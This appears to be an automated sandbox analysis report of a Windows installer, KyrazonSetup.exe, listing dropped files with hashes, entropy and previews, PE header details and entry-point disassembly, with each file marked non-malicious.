                                                                                    Preview:....x@..t@..m@..{"files":{"node_modules":{"files":{"@gar":{"files":{"promisify":{"files":{"LICENSE.md":{"size":1094,"integrity":{"algorithm":"SHA256","hash":"ef7d10c21fe01e47a90973abda734e9be75162e5f561a84e95c5dcb9adbb89ea","blockSize":4194304,"blocks":["ef7d10c21fe01e47a90973abda734e9be75162e5f561a84e95c5dcb9adbb89ea"]},"offset":"0"},"index.js":{"size":967,"integrity":{"algorithm":"SHA256","hash":"a4fe100eb176ab95328881fe9490ac91e72d3d2992ac7fb2b9562d264156a8a3","blockSize":4194304,"blocks":["a4fe100eb176ab95328881fe9490ac91e72d3d2992ac7fb2b9562d264156a8a3"]},"offset":"1094"},"package.json":{"size":440,"integrity":{"algorithm":"SHA256","hash":"8012d0cdd159557951b1cb6e25177feb5e6f01d007f09adacf897335db41be99","blockSize":4194304,"blocks":["8012d0cdd159557951b1cb6e25177feb5e6f01d007f09adacf897335db41be99"]},"offset":"2061"}}}}},"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):2068
                                                                                    Entropy (8bit):5.069793714252897
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:xdI5XxNvisJtb8yxRBkfh4E6dwpoXT8+bSOavNO27NOHjoJOI4spo+kpRiYTRHX:jOhNvierxRBkfWipoXTStJ60usi+k+gX
                                                                                    MD5:7DD3BDF130A37BCD5E7DE4CF642150E1
                                                                                    SHA1:9CBF17699F354BA7213202E5510C770DE077BA49
                                                                                    SHA-256:34CCBDFCBB0B54AE4DB54D50D12C0B923AB1B8F485FF93C9C2F64FE3FB574F12
                                                                                    SHA-512:35761D3536B6441DAB32E6394880915239A862E2E98C60E88A261887438BC308652776EB507775CF93D4B45050AC1CDE2E5CCF2088F494EA2AACE88F3A48DB1A
                                                                                    Malicious:false
                                                                                    Preview:.Shortcut [Version 1.11]..Creates, modifies or queries Windows shell links (shortcuts)...The syntax of this command is:..Shortcut.exe /F:filename /A:C|E|Q [/T:target] [/P:parameters] [/W:workingdir]. [/R:runstyle] [/I:icon,index] [/H:hotkey] [/D:description].. /F:filename : Specifies the .LNK shortcut file.. /A:action : Defines the action to take (C=Create, E=Edit or Q=Query).. /T:target : Defines the target path and file name the shortcut points to.. /P:parameters : Defines the command-line parameters to pass to the target.. /W:working dir : Defines the working directory the target starts with.. /R:run style : Defines the window state (1=Normal, 3=Max, 7=Min).. /I:icon,index : Defines the icon and optional index (file.exe or file.exe,0).. /H:hotkey : Defines the hotkey, a numeric value of the keyboard shortcut.. /D:description : Defines the description (or comment) for the shortcut... Notes:. - Any argument that contains spaces must be enclosed in "double
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):57344
                                                                                    Entropy (8bit):4.777530479814042
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:p8AcstBy9afhyO45SqNf/mmjVrqvn84Bhbrqtuv:p5csny9TVheqhQn8Igt+
                                                                                    MD5:59375510BDE2FF0DBA7A8197AD9F12BB
                                                                                    SHA1:B7AEF73FD5C9610860E2F3F6A3B8A21CB6873261
                                                                                    SHA-256:74CD07EF186D995AD75A0C2A153D1DD6F7B563987F5AA0FEFEF0A095708C02DD
                                                                                    SHA-512:EAA013B4885A4F05E998366317FE5BC46B7057C1F29653004787B0A6C40B445728A8EC63D0FA577E56293C34A27B508B7CC17A7A6AC95DE3C42541A51ECD12CC
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.=...S...S...S..]...S.".Y.'.S.......S.......S...R.".S.".X...S...U...S.Rich..S.........................PE..L...y;.B.................p..........k-............@.........................................................................x...P....................................................................................................................text...(i.......p.................. ..`.rdata..n...........................@..@.data....T.......@..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4634
                                                                                    Entropy (8bit):5.188773568132433
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:9TZeep5yuqi1CMzUucscpvqZMhhqYouHmGSGAs4BNOpAwSqjcOaUYR2INdIvcEW/:9TZePGCMzUlHpCuSSHmGFA7BUpAKjcYM
                                                                                    MD5:6A189C41A3363A8AE600243C952EDB05
                                                                                    SHA1:15980EBB621ED3936B2BCCDF7F2C3294D57219E5
                                                                                    SHA-256:ACC3C7E29780AEE7923B101855E25BD53CF6081F7553720F9DCEFE6116EF891C
                                                                                    SHA-512:B18297C5E83B22ABB022DDD7622F187BDDEFB7D3E4ECBA0D7FDB65D7926FE0F8107F1DC82005EE4AF9B41C2993888576D60A637AD141F0C7A9BC75DCC00B16D8
                                                                                    Malicious:false
                                                                                    Preview:var execFile = require('child_process').execFile;.var pathUtils = require('path');../*. * options object (also passed by query()). * target : The path the shortcut points to. * args : The arguments passed to the target as a string. * workingDir : The working directory of the target. * runStyle : State to open the window in: ws.NORMAL (1), ws.MAX (3), or ws.MIN (7). * icon : The path to the shortcut icon file. * iconIndex : An optional index for the image in the icon file. * hotkey : A numerical hotkey. * desc : A description. */..function parseQuery(stdout) {..// Parses the stdout of a shortcut.exe query into a JS object..var result = {};..result.expanded = {};..stdout.split(/[\r\n]+/)....filter(function(line) { return line.indexOf('=') !== -1; })....forEach(function(line) {.....var pair = line.split('=', 2),.....key = pair[0],.....value = pair[1];.....if (key === "TargetPath")......result.target = value;.....else if (key === "TargetPathExpanded")......result.expanded.target = value;..
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):577
                                                                                    Entropy (8bit):4.877056753350964
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:y1CBJ+rLgoPF8i81mbmF2P9nEP7oh1uj7HxY:y1CBJ0cG127oh0q
                                                                                    MD5:D35A29EB509D52F43AD8D7D7E57557CA
                                                                                    SHA1:73E4A065CFCA688E7F6813AF77BBD5DDB63F7148
                                                                                    SHA-256:540B79DE6A1C3583C8255B304849701744A9A640FA45F10B64EC983BE7BD408A
                                                                                    SHA-512:B722F588A5E49EB787D0F9AC266F50BACCF5FD3BD9F3023DC70833FB68F84605571FBAF8C459BFDE902C98F4572132FB8590EE03548ED6FD5F53DE5D30D5A90C
                                                                                    Malicious:false
                                                                                    Preview:{. "name": "windows-shortcuts",. "version": "0.1.6",. "description": "Create, edit, and query Windows shortcuts (.lnk files)",. "license": "MIT",. "author": "j201 <j201.alex@gmail.com> (http://j201.github.io)",. "main": "./lib/windows-shortcuts",. "typings": "./lib/windows-shortcuts.d.ts",. "repository": {. "type": "git",. "url": "git://github.com/j201/windows-shortcuts.git". },. "homepage": "http://github.com/j201/windows-shortcuts",. "devDependencies": {. "signal-exit": "^2.1.2",. "tape": "^4.4.0",. "tmp": "0.0.28",. "touch": "^1.0.0". }.}
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):107520
                                                                                    Entropy (8bit):6.442687067441468
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                    MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                    SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                    SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                    SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):267462
                                                                                    Entropy (8bit):4.19770221494855
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:8LuAqiYp4bhaz8Le7ICHKhsqdzoGq/p2Vy:hiHbhaMAIyAsqxip2Q
                                                                                    MD5:6FCB8A6C21A7E76A7BE2DC237B64916F
                                                                                    SHA1:893EF10567F7705144F407A6493A96AB341C7CCF
                                                                                    SHA-256:2BCEEF4822CA7CC3ADD4A9DCB67C51EFB51C656FCE96A3B840250DE15379959C
                                                                                    SHA-512:3B745740BBBE339542EF03FD15DD631FB775E6BF8CA54D6D2B9CEAD3AA5AAFC4CAB49E507BC93641E581412BBEB916A53608D5F5D971EA453779E72D2294DAFB
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):626313
                                                                                    Entropy (8bit):5.180772010538009
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:jMWiyz4J+1OFZAsXbJ8qPOzhXvKwvrBTbvUyMR/GLrOp:j2+lOF4h/DvNHvUiap
                                                                                    MD5:1A37F6614FF8799B1C063BC83C157CC3
                                                                                    SHA1:8238B9295E1DDE9DE0D6FD20578E82703131A228
                                                                                    SHA-256:4FBE07F71B706C2A2948EBA9A6B1979E23C83342B190723A6EC5251B2D6DAD7C
                                                                                    SHA-512:6677F65A0E26FDC2CFF6CEF0231F5E5F0713EE7C5CF7F488599A3C7AC3E8365AFAEC10B35D6145EA58D364151D8BCB08308765693A9797EA99B894D6E8224AC7
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):5180416
                                                                                    Entropy (8bit):6.360585559792186
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:56h3a0f1ABi1jP9LoS8lne0Zv8EgHI7JXYN3bgFNmEgMYmz2qA0Mr7wsVUsNCOzZ:sh3aMXoSHfPwksHldLiuNr
                                                                                    MD5:F16C36AE369609497BFD0847889BEC63
                                                                                    SHA1:5DCA218BF0B2A20D7D027FA10FDB1B8152564FE4
                                                                                    SHA-256:4488A958418227FBE6F64898C2F85EEFD87FC9E46AEA457233B38DB8A86E944D
                                                                                    SHA-512:9F06F4A318C8A3E2FDCCB6D983087184CFF37A2B79E0C1E85B3AC8E45695454C4AACB4468593EBBFFF64739B0D598BA4D1D9DD94187B1BBD82C1369C62781109
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):106
                                                                                    Entropy (8bit):4.724752649036734
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                    MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                    SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                    SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                    SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                    Malicious:false
                                                                                    Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):953856
                                                                                    Entropy (8bit):6.582980857445342
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:xYWOq/4Kt/Ku8n387ecbFb6Z5WoDYsHY6g3P0zAk7so:xY65/M387R56Z5WoDYsHY6g3P0zAk7s
                                                                                    MD5:0A8150E85160EA4311DDBD5B2D1B0B1B
                                                                                    SHA1:A012B8886EC9F305FF4A055CCDDD5FC1F6045869
                                                                                    SHA-256:0D56A41BEAD58FD5FEE44B2EE60485D4C80A3A639ACC42CFC57C8E059078DFE0
                                                                                    SHA-512:D2D853D072AE7AC6871C880F164EEAA6300D9F951DE3AACB4D65195407AA4A1EF18B9BEAE14B7EDA0936E4FCA5FB56B65038370D8E349893F3C8027526415921
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):9216
                                                                                    Entropy (8bit):5.530278822198483
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:VdkEgnuqkdVMvy7/xcfK4PRef6gQzYet89A2:Vdkbn4VMvy7UKcef6XzHAA2
                                                                                    MD5:4287DBF2AD9E000D8653137470528FB7
                                                                                    SHA1:D488EA09A1C35F9D773195B3CBDBB20E4878C0A4
                                                                                    SHA-256:35A523FE649201442C9FA00D875CF9ACF8CED7C11347726CC0C6DF5B0EDA9F95
                                                                                    SHA-512:E5DAFA93600E9C1E994B4E0131B841B2E14F76D874875926F90F1F1C2CFD9E2CAA374A1F584594F41E4FEB0C06E93115E9FA23237DBC31D3E1C208AD8D0CF58A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):95744
                                                                                    Entropy (8bit):6.8710970946240435
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:fn3DhuJJT35gGtLjbMGCDsTF7RqXqOGrgCf46qKn6LJ8Lr7f59aguhrAPfKS:fnNuJJT35gGtjMhDsTF7RqXqf8ZQEwy
                                                                                    MD5:21D805663834F61CB443545B8883FAF2
                                                                                    SHA1:B222C5CA1E4CB8A7BFF7EB7B78D46B8D99BF71E1
                                                                                    SHA-256:C18B46A68436D164C964BA9B208E5C27CCC50E6A5A2DB115E8FB086663B5308F
                                                                                    SHA-512:37836150EF2837F69B82399024D0B93DBDAC992971C7FE7B50959107C0520F5874D45F4230F08554514E3BD6A76D6E35C55C8AFD53F993ABA18F77475EF02001
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.825582780706362
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                                                                                    MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                                                                                    SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                                                                                    SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                                                                                    SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:7-zip archive data, version 0.4
                                                                                    Category:dropped
                                                                                    Size (bytes):79732311
                                                                                    Entropy (8bit):7.999995366647166
                                                                                    Encrypted:true
                                                                                    SSDEEP:1572864:V+BWqL9BHWFoNfUwbzu3YkHCtGD/v0778GxZE/vXJU7cg33NqRcw9fDE:8B1mEcwbWaGD/c7uP+9NqRhi
                                                                                    MD5:F4BA303BBD2991FEF3CB62103E07A8BA
                                                                                    SHA1:478A890EE26FF752134FE61881E8AC3D65BEABEA
                                                                                    SHA-256:04C7E564C1AAEBDCFA827E9B90C7B26ACFACB6CDDF8EAA2DAB4FF770AA7D166F
                                                                                    SHA-512:5E838B318CFA75572DF8747EEA778601D2A7424B5B8E91CD0DD9CDD2244572AF4C257A17D6341610803BE5A6FF9667530572DE90AADFD3C70FBCCD78FBD51D93
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6656
                                                                                    Entropy (8bit):4.997724806443559
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:17GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNT3e:5XhHR0aTQN4gRHdMqJVgNa
                                                                                    MD5:50BA20CAD29399E2DB9FA75A1324BD1D
                                                                                    SHA1:3850634BB15A112623222972EF554C8D1ECA16F4
                                                                                    SHA-256:E7B145ABC7C519E6BD91DC06B7B83D1E73735AC1AC37D30A7889840A6EED38FC
                                                                                    SHA-512:893E053FCB0A2D3742E2B13B869941A3A485B2BDA3A92567F84190CB1BE170B67D20CC71C6A2CB92F4202140C8AFD9C40A358496947D709E0C4B68D43A368754
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):446464
                                                                                    Entropy (8bit):6.5897298243131495
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:VQ+kwWa/1NfQWLv6rGnrpJJ7OELbg8reLy2dbJUa4xk+N9/2itUirbeaY:VvW0tLBp1cIeOwJL4xT/F5bY
                                                                                    MD5:D7778720208A94E2049972FB7A1E0637
                                                                                    SHA1:080D607B10F93C839EC3F07FAEC3548BB78AC4DC
                                                                                    SHA-256:98F425F30E42E85F57E039356E30D929E878FDB551E67ABFB9F71C31EEB5D44E
                                                                                    SHA-512:98493EA271738ED6BA3A02DE774DEEF267BFA3C16F3736F1A1A3856B9FECC07F0EA8670827E7EB4ED05C907E96425A0C762E7010CB55A09302CA3CFB3FE44B2B
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):434
                                                                                    Entropy (8bit):5.649898489247305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YKWSCuj9rrt+pumEikJ6cL7nsUIk5jU85BGXs:YKWJu5rrtksIm7fjjb+s
                                                                                    MD5:CED907CF89C78828D6160FA4A47963D7
                                                                                    SHA1:5D826F5F6FD083DE2A861107C1EC1B1602FA2F39
                                                                                    SHA-256:6E46E34F97D81F4DBB0577355BB8A583C1CD05361F488C4AD36D05E44B0A97AC
                                                                                    SHA-512:3EA200D510A58074445650589F97D1EE36E2DE0CBA03486C744FFF93D50E559B66EBE363A09BBD8E04FFF528A36FB749ECCE97B9F5FF988751FEA2E2787C33D8
                                                                                    Malicious:false
                                                                                    Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACu3ryiKftaQoCbKjKZwaN7EAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACFYJyJsaTd/TiLYYHdYik8+dZHtqYYPQ6/U/cquvMm8gAAAAAOgAAAAAIAACAAAADM2kbgovSC+szMLJN20Pn5/WL6wttWyybd7HOwndS0pzAAAACWVYvS2KAsW7st5vP/gcPeSeKnVzUrEzPCCtEaMilE7VdLaYvle7EuDmvPERBVcddAAAAAO5f+b7kX6omxu5i0hAgCroNWn+zQdAhqc1ZKPTA5CWpQJ6TP0SYnseZOxO0ue5JQkklFlL9duKptdHcWrj5UDQ=="}}
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):434
                                                                                    Entropy (8bit):5.649898489247305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YKWSCuj9rrt+pumEikJ6cL7nsUIk5jU85BGXs:YKWJu5rrtksIm7fjjb+s
                                                                                    MD5:CED907CF89C78828D6160FA4A47963D7
                                                                                    SHA1:5D826F5F6FD083DE2A861107C1EC1B1602FA2F39
                                                                                    SHA-256:6E46E34F97D81F4DBB0577355BB8A583C1CD05361F488C4AD36D05E44B0A97AC
                                                                                    SHA-512:3EA200D510A58074445650589F97D1EE36E2DE0CBA03486C744FFF93D50E559B66EBE363A09BBD8E04FFF528A36FB749ECCE97B9F5FF988751FEA2E2787C33D8
                                                                                    Malicious:false
                                                                                    Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACu3ryiKftaQoCbKjKZwaN7EAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACFYJyJsaTd/TiLYYHdYik8+dZHtqYYPQ6/U/cquvMm8gAAAAAOgAAAAAIAACAAAADM2kbgovSC+szMLJN20Pn5/WL6wttWyybd7HOwndS0pzAAAACWVYvS2KAsW7st5vP/gcPeSeKnVzUrEzPCCtEaMilE7VdLaYvle7EuDmvPERBVcddAAAAAO5f+b7kX6omxu5i0hAgCroNWn+zQdAhqc1ZKPTA5CWpQJ6TP0SYnseZOxO0ue5JQkklFlL9duKptdHcWrj5UDQ=="}}
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 6 20:54:17 2024, mtime=Tue Aug 6 20:54:26 2024, atime=Sun Jun 30 16:55:04 2024, length=172671488, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.979723564397633
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8cpOqpBuRcJtbBHIjKJKAfAnH5fTHGcmA/MNkIqyFm:8yOYBuRcJtbBHAQKAonBrGcmAikRyF
                                                                                    MD5:AC87BCD992D96F8747862D8F0C24A074
                                                                                    SHA1:74995DA378EEF2938A8A8AF68CA3BB8E09D8173F
                                                                                    SHA-256:42A445095A23EA06928060D64442496A7E696113C8771CE7E44F6205A017AAE2
                                                                                    SHA-512:C4AC49AC7515F207CCED9398B794E151C56D606823ED0AD660E22DBF18DC5CE574B9CFAA92DC6BC4A360E3F7F715B2D38A54043BC8F1BF546ACF4178FEA4D95C
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... .....)/K...Y..4K.....~.r.....J.....................8.:..DG..Yr?.D..U..k0.&...&......vk.v....1i. K...o..5K.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y...Local.<......CW.^.Y.....b......................di.L.o.c.a.l.....Z.1......Y....Programs..B.......Y...Y................................P.r.o.g.r.a.m.s.....b.1......Y...KYRAZO~1..J.......Y...Y.....S.....................e.X.K.y.r.a.z.o.n.G.o.d.o.t.....n.2...J..X. .KYRAZO~1.EXE..R.......Y..Y......C........................K.y.r.a.z.o.n.G.o.d.o.t...e.x.e.......r...............-.......q...........7........C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe..>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.K.y.r.a.z.o.n.G.o.d.o.t.\.K.y.r.a.z.o.n.G.o.d.o.t...e.x.e.........|....I.J.H..K..:...`.......X.......580913...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):32768
                                                                                    Entropy (8bit):0.017262956703125623
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                    Malicious:false
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.9999896835153494
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:KyrazonSetup.exe
                                                                                    File size:80'239'576 bytes
                                                                                    MD5:7a84bbeade50e7110fe8d278dc22b92d
                                                                                    SHA1:9624dde2043059402cc1f729684ecc2f9a424eef
                                                                                    SHA256:c765f61cee33c326acc4ea19256267c35129a1ec7edb567fe0b5ed9a88e3d6b1
                                                                                    SHA512:b5ca02ca5e7c493a400214bb573b8d26da4129edec880e807ca198dbfab5b1bb70cae00e63eacc4c2f17b175194e0af353eda500442788a0ada82e019b78095d
                                                                                    SSDEEP:1572864:F+BWqL9BHWFoNfUwbzu3YkHCtGD/v0778GxZE/vXJU7cg33NqRcw9fDv:MB1mEcwbWaGD/c7uP+9NqRhV
                                                                                    TLSH:830833B777A9946DD2017B7B248379A0027E70DB4314B67F4F0D31AC48AAD667C2EB60
                                                                                    Icon Hash:adaeb397f36b6331
                                                                                    Entrypoint:0x40320c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5C157F8F [Sat Dec 15 22:26:23 2018 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                                                                    Instruction
                                                                                    sub esp, 00000184h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A198h
                                                                                    mov dword ptr [esp+20h], ebx
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [004080A0h]
                                                                                    call dword ptr [0040809Ch]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [0045240Ch], eax
                                                                                    je 00007F0D806E1F33h
                                                                                    push ebx
                                                                                    call 00007F0D806E500Ah
                                                                                    cmp eax, ebx
                                                                                    je 00007F0D806E1F29h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 00408298h
                                                                                    push esi
                                                                                    call 00007F0D806E4F86h
                                                                                    push esi
                                                                                    call dword ptr [00408098h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], bl
                                                                                    jne 00007F0D806E1F0Dh
                                                                                    push 0000000Ah
                                                                                    call 00007F0D806E4FDEh
                                                                                    push 00000008h
                                                                                    call 00007F0D806E4FD7h
                                                                                    push 00000006h
                                                                                    mov dword ptr [00452404h], eax
                                                                                    call 00007F0D806E4FCBh
                                                                                    cmp eax, ebx
                                                                                    je 00007F0D806E1F31h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007F0D806E1F29h
                                                                                    or byte ptr [0045240Fh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408044h]
                                                                                    push ebx
                                                                                    call dword ptr [00408288h]
                                                                                    mov dword ptr [004524D8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+38h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 00434030h
                                                                                    call dword ptr [00408178h]
                                                                                    push 0040A188h
